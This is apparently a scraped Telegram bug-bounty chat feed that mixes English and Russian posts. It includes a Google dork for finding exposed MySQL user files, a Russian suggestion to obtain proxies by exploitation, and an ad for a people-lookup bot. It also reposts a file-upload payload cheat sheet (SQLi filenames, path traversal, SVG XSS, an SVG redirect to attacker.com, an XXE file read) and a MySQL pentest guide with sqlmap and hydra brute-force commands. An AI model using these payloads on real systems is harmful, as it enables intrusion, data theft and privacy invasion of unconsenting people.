3186
Talk and help about bugbounty
# Google Dork: "index of" "user.MYD" # Title: Disclosure of sensitive files. # Date: 15/08/2020 # Author: Sahil Saxena # LinkedIn: https://www.linkedin.com/in/sahil-saxena-1333b9174 # Twitter: https://twitter.com/Sahil_delinitor # GitHub: https://github.com/Sahil-69 # Bugcrowd: https://bugcrowd.com/Prickn Thanks, Sahil Saxena
Читать полностью…
а нафига они тебе? есть сайты с подпиской на пачки socks.. либо намути сам теми же сплоентами )
Читать полностью…
Hello everyone, this is a new information gathering bot, where you get all the information via email, phone number, username and more. Please do check and give a feedback
@Cipherinfo_bot
If there are any resources or material one could use please do share
Читать полностью…
Thanks but the genymotion I'm seeing is a paid version and the free is hard to setup on my pc
Читать полностью…
Hello please Does anyone know who to proxy a mobile by it's wifi hotspot through burpsuite
Читать полностью…
Anybody here know about nuclei headless template
Читать полностью…
hey everyone, does anyone have a premium-rate phone numbers? If so, may I kindly ask you to DM me?
Читать полностью…
👋 Hello,
While checking my target. I saw a url ending with config-apim.json.
It contains a client Id, clientlibrary and login.window.net.
What do you think?
On burps or terminal .. so it's gonna grep all the page?
Читать полностью…
https://medium.com/bugbountywriteup/my-hunt-discovering-microsoft-bugs-f6a9c790bec0
Читать полностью…
https://youtu.be/7IAGUD7By0c?si=kOHtzQ_OiYfP6hbc
Читать полностью…
When downloading you have to select the option that says personal use
Genymotion is free
However though I don't know much about this Frida or how to use it
Читать полностью…
I faced thesame thing sometime ago
So I just used genymotion emulator and frida
Let me explain it in more details I'm trying to proxy my phone through burpsuite and I can't cause I don't have a wifi Instead I'm using my phone's WiFi hotspot
Читать полностью…
🖥Chaining Vulnerabilities through File Upload🖥
SLQi⏳
'sleep(20).jpg
sleep(25)-- -.jpg
../../etc/passwd/logo.png
../../../logo.png
-> Set file name filename="svg onload=alert(document.domain)>" , filename="58832_300x300.jpg<svg onload=confirm()>"
-> Upload using .gif file
GIF89a/<svg/onload=alert(1)>/=alert(document.domain)//;
-> Upload using .svg file
<svg xmlns="w3.org/2000/svg" onload="alert(1)"/>
-> <?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "w3.org/Graphics/SVG/1…"><svg version="1.1" baseProfile="full" xmlns="w3.org/2000/svg">
<rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
<script type="text/javascript">
alert("HolyBugx XSS");
</script>
</svg>
<code>
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<svg
onload="window.location='attacker.com'"
xmlns="w3.org/2000/svg">
<rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
</svg>
</code>
<?xml version="1.0" standalone="yes"?>Читать полностью…
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]>
<svg width="500px" height="500px" xmlns="w3.org/2000/svg" xmlns:xlink="w3.org/1999/xlink" version="1.1
<text font-size="40" x="0" y="16">&xxe;</text>
</svg>
Penetration Testing on MySQL Port 3306
MySQL is a popular open-source relational database management system (RDBMS) that is widely used in web applications. As a penetration tester, it's essential to identify vulnerabilities in MySQL to prevent unauthorized access to sensitive data. In this article, we'll explore how to conduct a penetration test on MySQL Port 3306.
Initial Reconnaissance
Before we begin, let's perform some initial reconnaissance to gather information about the target system. We can use tools like Nmap to scan the target IP address and identify open ports.nmap -sT 192.168.1.100
The output should reveal that port 3306 is open, indicating that MySQL is running on the target system.
MySQL Version Scanning
Next, we'll use Nmap to scan the MySQL version. We can use the -sV option to enable version detection.nmap -sV 192.168.1.100 -p 3306
The output should display the MySQL version, which can help us identify potential vulnerabilities.
Authentication Bypass
Now, let's try to bypass authentication using the mysql command. We can use the -h option to specify the target IP address and the -u option to specify the username.mysql -h 192.168.1.100 -u root
If the password is not set or is weak, we might be able to gain access to the MySQL database without authentication.
SQL Injection
SQL injection is a common vulnerability in web applications that use MySQL. We can use tools like SQLMap to identify SQL injection vulnerabilities.sqlmap -u "http://192.168.1.100/vulnerable.php?id=1" --dbms=mysql
SQLMap will attempt to inject SQL code to extract sensitive data from the database.
Brute Force Attack
If we're unable to bypass authentication or find an SQL injection vulnerability, we can try a brute force attack using tools like Hydra.hydra -l root -P /usr/share/wordlists/rockyou.txt 192.168.1.100 mysql
Hydra will attempt to guess the password using a dictionary attack.
Conclusion I've demonstrated how to conduct a penetration test on MySQL Port 3306. We've shown how to perform initial reconnaissance, scan the MySQL version, bypass authentication, identify SQL injection vulnerabilities, and launch a brute force attack. Remember to always conduct penetration tests with permission from the system owner and to follow applicable laws and regulations.